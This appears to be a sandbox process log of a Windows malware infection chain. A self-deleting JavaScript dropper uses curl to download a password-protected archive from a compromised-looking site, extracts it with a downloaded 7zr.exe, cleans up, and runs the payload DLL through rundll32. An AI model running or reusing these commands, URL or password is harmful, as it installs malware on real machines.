wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js
2544cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
2636cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
2700curl.exe curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location
2864curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y"
2936cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
2508animi.y "C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o"
2656cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
2752cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
2824cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
2912rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
2964rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
1456cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
3040